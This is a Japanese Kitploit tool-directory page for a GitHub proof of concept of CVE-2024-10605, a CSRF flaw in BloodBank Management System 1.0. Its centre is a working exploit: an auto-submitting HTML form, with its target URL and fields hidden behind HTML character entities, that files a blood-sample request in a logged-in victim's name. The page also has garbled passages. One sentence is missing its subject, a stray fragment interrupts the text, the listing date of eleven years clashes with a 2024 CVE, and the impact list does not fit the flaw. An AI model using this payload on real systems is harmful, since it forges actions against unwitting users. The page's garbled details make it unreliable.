Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10605 — CVE-2024-10605の概念実証。BloodBank Management System 1.0のCSRF脆弱性で、不正な血液サンプル要求を可能にします。 | Kitploit
ツール/GitHubGitHub/bevennyamande/cve-2024-10605
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

CVE-2024-10605の概念実証。BloodBank Management System 1.0のCSRF脆弱性で、不正な血液サンプル要求を可能にします。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

影響を受けるバージョン:

  • BloodBank Management System: 1.0

脆弱性情報:

  • 脆弱性タイプ: Cross Site Request Forgery (CSRF)
  • 重要度: HIGH
  • ステータス: Unpatched

脆弱なエンドポイント:

  • パス: file/request.php

脆弱性の説明:

このエンドポイント /file/request.php に Cross Site Request Forgery が存在し、リモートユーザーがログイン中の receiver のアカウントで、選択した病院の利用可能な血液サンプルから blood sample リクエストを開始できるようになります。

悪用に成功すると、被害者に代わってが行われる可能性があります。さらに、ペイロードを含む悪意のあるウェブサイトにアクセスすることで悪用される可能性があります。

不正な操作

概念実証 (PoC):

以下は、ログインしている receiver のアカウントから blood sample リクエストを開始する CSRF PoC 攻撃 の例です:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






影響:

  • データ改ざん: 攻撃者はユーザーに表示されるコンテンツを変更する可能性があります。
  • 評判の低下: 悪意のある動作により、ユーザーがシステムへの信頼を失う可能性があります。

緩和策の推奨事項:

  1. CSRF トークンを使用する クロスドメインアクセスを防ぐためのメカニズムを実装するか、リクエストに csrf tokens を含めてください。

ツールをダウンロード